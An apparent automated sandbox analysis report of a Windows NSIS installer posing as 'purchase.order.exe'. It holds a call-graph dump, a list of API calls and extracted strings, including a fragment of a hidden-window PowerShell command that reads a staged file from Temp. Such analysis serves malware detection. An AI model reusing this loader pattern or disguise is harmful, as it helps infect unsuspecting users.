lstrlenW 3736->3888 3740 403119 GetFileSize 3741 403213 3740->3741 3752 403130 3740->3752 3893 40303e 3741->3893 3743 40321c 3745 40324c GlobalAlloc 3743->3745 3743->3759 3905 4034d4 SetFilePointer 3743->3905 3744 4034be ReadFile 3744->3752 3904 4034d4 SetFilePointer 3745->3904 3746 40327f 3750 40303e 6 API calls 3746->3750 3749 403267 3754 4032d9 39 API calls 3749->3754 3750->3759 3751 403235 3753 4034be ReadFile 3751->3753 3752->3741 3752->3744 3752->3746 3755 40303e 6 API calls 3752->3755 3752->3759 3756 403240 3753->3756 3757 403273 3754->3757 3755->3752 3756->3745 3756->3759 3757->3757 3758 4032b0 SetFilePointer 3757->3758 3757->3759 3758->3759 3759->3664 3761 406935 5 API calls 3760->3761 3762 403c27 3761->3762 3763 403c2d 3762->3763 3764 403c3f 3762->3764 3914 406488 wsprintfW 3763->3914 3765 40640f 3 API calls 3764->3765 3766 403c6f 3765->3766 3768 403c8e lstrcatW 3766->3768 3770 40640f 3 API calls 3766->3770 3769 403c3d 3768->3769 3906 403ee9 3769->3906 3770->3768 3773 405f18 18 API calls 3774 403cc0 3773->3774 3775 403d54 3774->3775 3777 40640f 3 API calls 3774->3777 3776 405f18 18 API calls 3775->3776 3780 403d5a 3776->3780 3778 403cf2 3777->3778 3778->3775 3784 403d13 lstrlenW 3778->3784 3787 405e3d CharNextW 3778->3787 3779 403d6a LoadImageW 3782 403e10 3779->3782 3783 403d91 RegisterClassW 3779->3783 3780->3779 3781 40657e 21 API calls 3780->3781 3781->3779 3786 40140b 2 API calls 3782->3786 3785 403dc7 SystemParametersInfoW CreateWindowExW 3783->3785 3815 403e1a 3783->3815 3788 403d21 lstrcmpiW 3784->3788 3789 403d47 3784->3789 3785->3782 3790 403e16 3786->3790 3792 403d10 3787->3792 3788->3789 3793 403d31 GetFileAttributesW 3788->3793 3791 405e10 3 API calls 3789->3791 3794 403ee9 22 API calls 3790->3794 3790->3815 3795 403d4d 3791->3795 3792->3784 3796 403d3d 3793->3796 3798 403e27 3794->3798 3915 406541 lstrcpynW 3795->3915 3796->3789 3797 405e5c 2 API calls 3796->3797 3797->3789 3800 403e33 ShowWindow 3798->3800 3801 403eb6 3798->3801 3803 4068c5 3 API calls 3800->3803 3802 405699 5 API calls 3801->3802 3804 403ebc 3802->3804 3805 403e4b 3803->3805 3806 403ec0 3804->3806 3807 403ed8 3804->3807 3808 403e59 GetClassInfoW 3805->3808 3810 4068c5 3 API calls 3805->3810 3813 40140b 2 API calls 3806->3813 3806->3815 3809 40140b 2 API calls 3807->3809 3811 403e83 DialogBoxParamW 3808->3811 3812 403e6d GetClassInfoW RegisterClassW 3808->3812 3809->3815 3810->3808 3814 40140b 2 API calls 3811->3814 3812->3811 3813->3815 3814->3815 3815->3667 3816->3654 3917 406541 lstrcpynW 3817->3917 3819 405f29 3820 405ebb 4 API calls 3819->3820 3821 405f2f 3820->3821 3822 4038fd 3821->3822 3823 4067ef 5 API calls 3821->3823 3822->3667 3831 406541 lstrcpynW 3822->3831 3829 405f3f 3823->3829 3824 405f70 lstrlenW 3825 405f7b 3824->3825 3824->3829 3827 405e10 3 API calls 3825->3827 3826 40689e 2 API calls 3826->3829 3828 405f80 GetFileAttributesW 3827->3828 3828->3822 3829->3822 3829->3824 3829->3826 3830 405e5c 2 API calls 3829->3830 3830->3824 3831->3701 3832->3670 3833->3696 3834->3717 3836 405f18 18 API calls 3835->3836 3837 405c6d 3836->3837 3838 405c75 DeleteFileW 3837->3838 3839 405c8c 3837->3839 3840 405dc3 3838->3840 3841 405dac 3839->3841 3918 406541 lstrcpynW 3839->3918 3840->3717 3841->3840 3848 40689e 2 API calls 3841->3848 3843 405cb2 3844 405cc5 3843->3844 3845 405cb8 lstrcatW 3843->3845 3847 405e5c 2 API calls 3844->3847 3846 405ccb 3845->3846 3849 405cdb lstrcatW 3846->3849 3851 405ce6 lstrlenW FindFirstFileW 3846->3851 3847->3846 3850 405dd1 3848->3850 3849->3851 3850->3840 3852 405e10 3 API calls 3850->3852 3851->3841 3866 405d08 3851->3866 3853 405ddb 3852->3853 3854 405c05 5 API calls 3853->3854 3857 405de7 3854->3857 3856 405d8f FindNextFileW 3858 405da5 FindClose 3856->3858 3856->3866 3859 405e01 3857->3859 3860 405deb 3857->3860 3858->3841 3862 4055c6 28 API calls 3859->3862 3860->3840 3863 4055c6 28 API calls 3860->3863 3862->3840 3865 405df8 3863->3865 3864 405c4d 64 API calls 3864->3866 3868 406301 40 API calls 3865->3868 3866->3856 3866->3864 3867 4055c6 28 API calls 3866->3867 3869 4055c6 28 API calls 3866->3869 3870 406301 40 API calls 3866->3870 3919 406541 lstrcpynW 3866->3919 3920 405c05 3866->3920 3867->3856 3868->3840 3869->3866 3870->3866 3872 406315 3871->3872 3874 403a16 CopyFileW 3871->3874 3928 406187 3872->3928 3874->3667 3874->3717 3876 403b51 3875->3876 3877 403b43 CloseHandle 3875->3877 3962 403b7e 3876->3962 3877->3876 3880 405c4d 71 API calls 3881 403a6c OleUninitialize 3880->3881 3881->3676 3881->3677 3883 40606d GetTickCount GetTempFileNameW 3882->3883 3884 40351a 3883->3884 3885 4060a3 3883->3885 3884->3656 3885->3883 3885->3884 3886->3734 3887->3736 3889 405e6a 3888->3889 3890 405e70 CharPrevW 3889->3890 3891 40310e 3889->3891 3890->3889 3890->3891 3892 406541 lstrcpynW 3891->3892 3892->3740 3894 403047 3893->3894 3895 40305f 3893->3895 3896 403050 DestroyWindow 3894->3896 3897 403057 3894->3897 3898 403067 3895->3898 3899 40306f GetTickCount 3895->3899 3896->3897 3897->3743 3902 406971 2 API calls 3898->3902 3900 4030a0 3899->3900 3901 40307d CreateDialogParamW ShowWindow 3899->3901 3900->3743 3901->3900 3903 40306d 3902->3903 3903->3743 3904->3749 3905->3751 3907 403efd 3906->3907 3916 406488 wsprintfW 3907->3916 3909 403f6e 3910 403fa2 22 API calls 3909->3910 3912 403f73 3910->3912 3911 403c9e 3911->3773 3912->3911 3913 40657e 21 API calls 3912->3913 3913->3912 3914->3769 3915->3775 3916->3909 3917->3819 3918->3843 3919->3866 3921 40600c 2 API calls 3920->3921 3922 405c11 3921->3922 3923 405c20 RemoveDirectoryW 3922->3923 3924 405c28 DeleteFileW 3922->3924 3926 405c32 3922->3926 3925 405c2e 3923->3925 3924->3925 3925->3926 3927 405c3e SetFileAttributesW 3925->3927 3926->3866 3927->3926 3929 4061b7 3928->3929 3930 4061dd GetShortPathNameW 3928->3930 3955 406031 GetFileAttributesW CreateFileW 3929->3955 3932 4061f2 3930->3932 3933 4062fc 3930->3933 3932->3933 3935 4061fa wsprintfA 3932->3935 3933->3874 3934 4061c1 CloseHandle GetShortPathNameW 3934->3933 3936 4061d5 3934->3936 3937 40657e 21 API calls 3935->3937 3936->3930 3936->3933 3938 406222 3937->3938 3956 406031 GetFileAttributesW CreateFileW 3938->3956 3940 40622f 3940->3933 3941 40623e GetFileSize GlobalAlloc 3940->3941 3942 406260 3941->3942 3943 4062f5 CloseHandle 3941->3943 3944 4060b4 ReadFile 3942->3944 3943->3933 3945 406268 3944->3945 3945->3943 3957 405f96 lstrlenA 3945->3957 3948 406293 3950 405f96 4 API calls 3948->3950 3949 40627f lstrcpyA 3951 4062a1 3949->3951 3950->3951 3952 4062d8 SetFilePointer 3951->3952 3953 4060e3 WriteFile 3952->3953 3954 4062ee GlobalFree 3953->3954 3954->3943 3955->3934 3956->3940 3958 405fd7 lstrlenA 3957->3958 3959 405fb0 lstrcmpiA 3958->3959 3960 405fdf 3958->3960 3959->3960 3961 405fce CharNextA 3959->3961 3960->3948 3960->3949 3961->3958 3963 403b8c 3962->3963 3964 403b56 3963->3964 3965 403b91 FreeLibrary GlobalFree 3963->3965 3964->3880 3965->3964 3965->3965 4487 401b9c 4488 402dcb 21 API calls 4487->4488 4489 401ba3 4488->4489 4490 402da9 21 API calls 4489->4490 4491 401bac wsprintfW 4490->4491 4492 402c4f 4491->4492 4493 40149e 4494 4023c2 4493->4494 4495 4014ac PostQuitMessage 4493->4495 4495->4494 4496 4016a0 4497 402dcb 21 API calls 4496->4497 4498 4016a7 4497->4498 4499 402dcb 21 API calls 4498->4499 4500 4016b0 4499->4500 4501 402dcb 21 API calls 4500->4501 4502 4016b9 MoveFileW 4501->4502 4503 4016c5 4502->4503 4504 4016cc 4502->4504 4506 401423 28 API calls 4503->4506 4505 40689e 2 API calls 4504->4505 4508 40231b 4504->4508 4507 4016db 4505->4507 4506->4508 4507->4508 4509 406301 40 API calls 4507->4509 4509->4503 4510 401a24 4511 402dcb 21 API calls 4510->4511 4512 401a2b 4511->4512 4513 402dcb 21 API calls 4512->4513 4514 401a34 4513->4514 4515 401a3b lstrcmpiW 4514->4515 4516 401a4d lstrcmpW 4514->4516 4517 401a41 4515->4517 4516->4517 4518 402324 4519 402dcb 21 API calls 4518->4519 4520 40232a 4519->4520 4521 402dcb 21 API calls 4520->4521 4522 402333 4521->4522 4523 402dcb 21 API calls 4522->4523 4524 40233c 4523->4524 4525 40689e 2 API calls 4524->4525 4526 402345 4525->4526 4527 402356 lstrlenW lstrlenW 4526->4527 4528 402349 4526->4528 4530 4055c6 28 API calls 4527->4530 4529 4055c6 28 API calls 4528->4529 4532 402351 4528->4532 4529->4532 4531 402394 SHFileOperationW 4530->4531 4531->4528 4531->4532 4533 401da6 4534 401db9 GetDlgItem 4533->4534 4535 401dac 4533->4535 4536 401db3 4534->4536 4537 402da9 21 API calls 4535->4537 4538 401dfa GetClientRect LoadImageW SendMessageW 4536->4538 4539 402dcb 21 API calls 4536->4539 4537->4536 4541 401e58 4538->4541 4543 401e64 4538->4543 4539->4538 4542 401e5d DeleteObject 4541->4542 4541->4543 4542->4543 4544 4023a8 4545 4023c2 4544->4545 4546 4023af 4544->4546 4547 40657e 21 API calls 4546->4547 4548 4023bc 4547->4548 4549 405ba1 MessageBoxIndirectW 4548->4549 4549->4545 4557 404f2d GetDlgItem GetDlgItem 4558 404f7f 7 API calls 4557->4558 4562 4051a4 4557->4562 4559 405026 DeleteObject 4558->4559 4560 405019 SendMessageW 4558->4560 4561 40502f 4559->4561 4560->4559 4563 405066 4561->4563 4564 40657e 21 API calls 4561->4564 4577 405286 4562->4577 4591 405213 4562->4591 4611 404e7b SendMessageW 4562->4611 4565 4044c0 22 API calls 4563->4565 4569 405048 SendMessageW SendMessageW 4564->4569 4570 40507a 4565->4570 4566 405332 4567 405344 4566->4567 4568 40533c SendMessageW 4566->4568 4579 405356 ImageList_Destroy 4567->4579 4580 40535d 4567->4580 4588 40536d 4567->4588 4568->4567 4569->4561 4575 4044c0 22 API calls 4570->4575 4571 405197 4573 404527 8 API calls 4571->4573 4572 405278 SendMessageW 4572->4577 4578 405533 4573->4578 4592 40508b 4575->4592 4576 4052df SendMessageW 4576->4571 4582 4052f4 SendMessageW 4576->4582 4577->4566 4577->4571 4577->4576 4579->4580 4583 405366 GlobalFree 4580->4583 4580->4588 4581 4054e7 4581->4571 4586 4054f9 ShowWindow GetDlgItem ShowWindow 4581->4586 4585 405307 4582->4585 4583->4588 4584 405166 GetWindowLongW SetWindowLongW 4587 40517f 4584->4587 4593 405318 SendMessageW 4585->4593 4586->4571 4589 405184 ShowWindow 4587->4589 4590 40519c 4587->4590 4588->4581 4604 4053a8 4588->4604 4616 404efb 4588->4616 4609 4044f5 SendMessageW 4589->4609 4610 4044f5 SendMessageW 4590->4610 4591->4572 4591->4577 4592->4584 4594 405161 4592->4594 4597 4050de SendMessageW 4592->4597 4598 405130 SendMessageW 4592->4598 4599 40511c SendMessageW 4592->4599 4593->4566 4594->4584 4594->4587 4597->4592 4598->4592 4599->4592 4601 4054b2 4602 4054bd InvalidateRect 4601->4602 4605 4054c9 4601->4605 4602->4605 4603 4053d6 SendMessageW 4607 4053ec 4603->4607 4604->4603 4604->4607 4605->4581 4625 404e36 4605->4625 4606 405460 SendMessageW SendMessageW 4606->4607 4607->4601 4607->4606 4609->4571 4610->4562 4612 404eda SendMessageW 4611->4612 4613 404e9e GetMessagePos ScreenToClient SendMessageW 4611->4613 4614 404ed2 4612->4614 4613->4614 4615 404ed7 4613->4615 4614->4591 4615->4612 4628 406541 lstrcpynW 4616->4628 4618 404f0e 4629 406488 wsprintfW 4618->4629 4620 404f18 4621 40140b 2 API calls 4620->4621 4622 404f21 4621->4622 4630 406541 lstrcpynW 4622->4630 4624 404f28 4624->4604 4631 404d6d 4625->4631 4627 404e4b 4627->4581 4628->4618 4629->4620 4630->4624 4632 404d86 4631->4632 4633 40657e 21 API calls 4632->4633 4634 404dea 4633->4634 4635 40657e 21 API calls 4634->4635 4636 404df5 4635->4636 4637 40657e 21 API calls 4636->4637 4638 404e0b lstrlenW wsprintfW SetDlgItemTextW 4637->4638 4638->4627 3966 4024af 3967 402dcb 21 API calls 3966->3967 3968 4024c1 3967->3968 3969 402dcb 21 API calls 3968->3969 3970 4024cb 3969->3970 3983 402e5b 3970->3983 3973 402953 3974 402503 3975 40250f 3974->3975 3978 402da9 21 API calls 3974->3978 3979 40252e RegSetValueExW 3975->3979 3980 4032d9 39 API calls 3975->3980 3976 402dcb 21 API calls 3977 4024f9 lstrlenW 3976->3977 3977->3974 3978->3975 3981 402544 RegCloseKey 3979->3981 3980->3979 3981->3973 3984 402e76 3983->3984 3987 4063dc 3984->3987 3988 4063eb 3987->3988 3989 4024db 3988->3989 3990 4063f6 RegCreateKeyExW 3988->3990 3989->3973 3989->3974 3989->3976 3990->3989 4639 404630 lstrlenW 4640 404651 WideCharToMultiByte 4639->4640 4641 40464f 4639->4641 4641->4640 4642 402930 4643 402dcb 21 API calls 4642->4643 4644 402937 FindFirstFileW 4643->4644 4645 40294a 4644->4645 4646 40295f 4644->4646 4647 402968 4646->4647 4650 406488 wsprintfW 4646->4650 4651 406541 lstrcpynW 4647->4651 4650->4647 4651->4645 4652 401931 4653 401968 4652->4653 4654 402dcb 21 API calls 4653->4654 4655 40196d 4654->4655 4656 405c4d 71 API calls 4655->4656 4657 401976 4656->4657 4658 4049b1 4659 4049dd 4658->4659 4660 4049ee 4658->4660 4719 405b85 GetDlgItemTextW 4659->4719 4662 4049fa GetDlgItem 4660->4662 4665 404a59 4660->4665 4664 404a0e 4662->4664 4663 4049e8 4666 4067ef 5 API calls 4663->4666 4668 404a22 SetWindowTextW 4664->4668 4673 405ebb 4 API calls 4664->4673 4669 40657e 21 API calls 4665->4669 4679 404b3d 4665->4679 4717 404cec 4665->4717 4666->4660 4671 4044c0 22 API calls 4668->4671 4674 404acd SHBrowseForFolderW 4669->4674 4670 404b6d 4675 405f18 18 API calls 4670->4675 4676 404a3e 4671->4676 4672 404527 8 API calls 4677 404d00 4672->4677 4682 404a18 4673->4682 4678 404ae5 CoTaskMemFree 4674->4678 4674->4679 4680 404b73 4675->4680 4681 4044c0 22 API calls 4676->4681 4683 405e10 3 API calls 4678->4683 4679->4717 4721 405b85 GetDlgItemTextW 4679->4721 4722 406541 lstrcpynW 4680->4722 4684 404a4c 4681->4684 4682->4668 4685 405e10 3 API calls 4682->4685 4686 404af2 4683->4686 4720 4044f5 SendMessageW 4684->4720 4685->4668 4689 404b29 SetDlgItemTextW 4686->4689 4694 40657e 21 API calls 4686->4694 4689->4679 4690 404a52 4692 406935 5 API calls 4690->4692 4691 404b8a 4693 406935 5 API calls 4691->4693 4692->4665 4701 404b91 4693->4701 4695 404b11 lstrcmpiW 4694->4695 4695->4689 4698 404b22 lstrcatW 4695->4698 4696 404bd2 4723 406541 lstrcpynW 4696->4723 4698->4689 4699 404bd9 4700 405ebb 4 API calls 4699->4700 4702 404bdf GetDiskFreeSpaceW 4700->4702 4701->4696 4704 405e5c 2 API calls 4701->4704 4706 404c2a 4701->4706 4705 404c03 MulDiv 4702->4705 4702->4706 4704->4701 4705->4706 4707 404c9b 4706->4707 4708 404e36 24 API calls 4706->4708 4709 404cbe 4707->4709 4711 40140b 2 API calls 4707->4711 4710 404c88 4708->4710 4724 4044e2 KiUserCallbackDispatcher 4709->4724 4713 404c9d SetDlgItemTextW 4710->4713 4714 404c8d 4710->4714 4711->4709 4713->4707 4716 404d6d 24 API calls 4714->4716 4715 404cda 4715->4717 4718 40490a SendMessageW 4715->4718 4716->4707 4717->4672 4718->4717 4719->4663 4720->4690 4721->4670 4722->4691 4723->4699 4724->4715 4725 401934 4726 402dcb 21 API calls 4725->4726 4727 40193b 4726->4727 4728 405ba1 MessageBoxIndirectW 4727->4728 4729 401944 4728->4729 4730 4028b6 4731 4028bd 4730->4731 4734 402bce 4730->4734 4732 402da9 21 API calls 4731->4732 4733 4028c4 4732->4733 4735 4028d3 SetFilePointer 4733->4735 4735->4734 4736 4028e3 4735->4736 4738 406488 wsprintfW 4736->4738 4738->4734 4739 401f37 4740 402dcb 21 API calls 4739->4740 4741 401f3d 4740->4741 4742 402dcb 21 API calls 4741->4742 4743 401f46 4742->4743 4744 402dcb 21 API calls 4743->4744 4745 401f4f 4744->4745 4746 402dcb 21 API calls 4745->4746 4747 401f58 4746->4747 4748 401423 28 API calls 4747->4748 4749 401f5f 4748->4749 4756 405b67 ShellExecuteExW 4749->4756 4751 401fa7 4752 4069e0 5 API calls 4751->4752 4754 402953 4751->4754 4753 401fc4 CloseHandle 4752->4753 4753->4754 4756->4751 4757 402fb8 4758 402fe3 4757->4758 4759 402fca SetTimer 4757->4759 4760 403038 4758->4760 4761 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4758->4761 4759->4758 4761->4760 4762 4014b8 4763 4014be 4762->4763 4764 401389 2 API calls 4763->4764 4765 4014c6 4764->4765 4766 40553a 4767 40554a 4766->4767 4768 40555e 4766->4768 4770 405550 4767->4770 4771 4055a7 4767->4771 4769 405566 IsWindowVisible 4768->4769 4777 40557d 4768->4777 4769->4771 4772 405573 4769->4772 4774 40450c SendMessageW 4770->4774 4773 4055ac CallWindowProcW 4771->4773 4775 404e7b 5 API calls 4772->4775 4776 40555a 4773->4776 4774->4776 4775->4777 4777->4773 4778 404efb 4 API calls 4777->4778 4778->4771 4779 401d3c 4780 402da9 21 API calls 4779->4780 4781 401d42 IsWindow 4780->4781 4782 401a45 4781->4782

                                          Executed Functions

                                          Function 0040351C Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464stringfilecomCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 40351c-40356e SetErrorMode GetVersionExW 1 403570-4035a0 GetVersionExW 0->1 2 4035a8-4035ad 0->2 1->2 3 4035b5-4035f7 2->3 4 4035af 2->4 5 4035f9-403601 call 406935 3->5 6 40360a 3->6 4->3 5->6 12 403603 5->12 7 40360f-403623 call 4068c5 lstrlenA 6->7 13 403625-403641 call 406935 * 3 7->13 12->6 20 403652-4036b6 #17 OleInitialize SHGetFileInfoW call 406541 GetCommandLineW call 406541 13->20 21 403643-403649 13->21 28 4036b8-4036ba 20->28 29 4036bf-4036d3 call 405e3d CharNextW 20->29 21->20 26 40364b 21->26 26->20 28->29 32 4037ce-4037d4 29->32 33 4036d8-4036de 32->33 34 4037da 32->34 35 4036e0-4036e5 33->35 36 4036e7-4036ee 33->36 37 4037ee-403808 GetTempPathW call 4034eb 34->37 35->35 35->36 39 4036f0-4036f5 36->39 40 4036f6-4036fa 36->40 44 403860-40387a DeleteFileW call 4030a2 37->44 45 40380a-403828 GetWindowsDirectoryW lstrcatW call 4034eb 37->45 39->40 42 403700-403706 40->42 43 4037bb-4037ca call 405e3d 40->43 47 403720-403759 42->47 48 403708-40370f 42->48 43->32 61 4037cc-4037cd 43->61 66 403880-403886 44->66 67 403a67-403a77 call 403b39 OleUninitialize 44->67 45->44 64 40382a-40385a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034eb 45->64 49 403776-4037b0 47->49 50 40375b-403760 47->50 54 403711-403714 48->54 55 403716 48->55 58 4037b2-4037b6 49->58 59 4037b8-4037ba 49->59 50->49 56 403762-40376a 50->56 54->47 54->55 55->47 62 403771 56->62 63 40376c-40376f 56->63 58->59 65 4037dc-4037e9 call 406541 58->65 59->43 61->32 62->49 63->49 63->62 64->44 64->67 65->37 70 40388c-403897 call 405e3d 66->70 71 40391f-403926 call 403c13 66->71 78 403a79-403a89 call 405ba1 ExitProcess 67->78 79 403a9d-403aa3 67->79 81 4038e5-4038ef 70->81 82 403899-4038ce 70->82 77 40392b-40392f 71->77 77->67 83 403b21-403b29 79->83 84 403aa5-403abb GetCurrentProcess OpenProcessToken 79->84 89 4038f1-4038ff call 405f18 81->89 90 403934-40395a call 405b0c lstrlenW call 406541 81->90 86 4038d0-4038d4 82->86 91 403b2b 83->91 92 403b2f-403b33 ExitProcess 83->92 87 403af1-403aff call 406935 84->87 88 403abd-403aeb LookupPrivilegeValueW AdjustTokenPrivileges 84->88 94 4038d6-4038db 86->94 95 4038dd-4038e1 86->95 104 403b01-403b0b 87->104 105 403b0d-403b18 ExitWindowsEx 87->105 88->87 89->67 106 403905-40391b call 406541 * 2 89->106 110 40396b-403983 90->110 111 40395c-403966 call 406541 90->111 91->92 94->95 99 4038e3 94->99 95->86 95->99 99->81 104->105 108 403b1a-403b1c call 40140b 104->108 105->83 105->108 106->71 108->83 116 403988-40398c 110->116 111->110 118 403991-4039bb wsprintfW call 40657e 116->118 122 4039c4 call 405aef 118->122 123 4039bd-4039c2 call 405a95 118->123 126 4039c9-4039cb 122->126 123->126 128 403a07-403a26 SetCurrentDirectoryW call 406301 CopyFileW 126->128 129 4039cd-4039d7 GetFileAttributesW 126->129 137 403a65 128->137 138 403a28-403a49 call 406301 call 40657e call 405b24 128->138 130 4039f8-403a03 129->130 131 4039d9-4039e2 DeleteFileW 129->131 130->116 134 403a05 130->134 131->130 133 4039e4-4039f6 call 405c4d 131->133 133->118 133->130 134->67 137->67 146 403a4b-403a55 138->146 147 403a8f-403a9b CloseHandle 138->147 146->137 148 403a57-403a5f call 40689e 146->148 147->137 148->118 148->137
                                          APIs
                                          • SetErrorMode.KERNELBASE ref: 0040353F
                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                          • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                          • OleInitialize.OLE32(00000000), ref: 0040365A
                                          • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                          • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\purchase.order.exe",00000020,"C:\Users\user\Desktop\purchase.order.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                          • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\purchase.order.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                            • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                          • wsprintfW.USER32 ref: 0040399B
                                          • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
                                          • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08
                                            • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                          • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E
                                            • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                            • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                            • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(?,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,774D3420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                            • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                          • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                          • ExitProcess.KERNEL32 ref: 00403A89
                                          • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                          • ExitProcess.KERNEL32 ref: 00403B33
                                            • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                          • String ID: "C:\Users\user\Desktop\purchase.order.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$~nsu%X.tmp
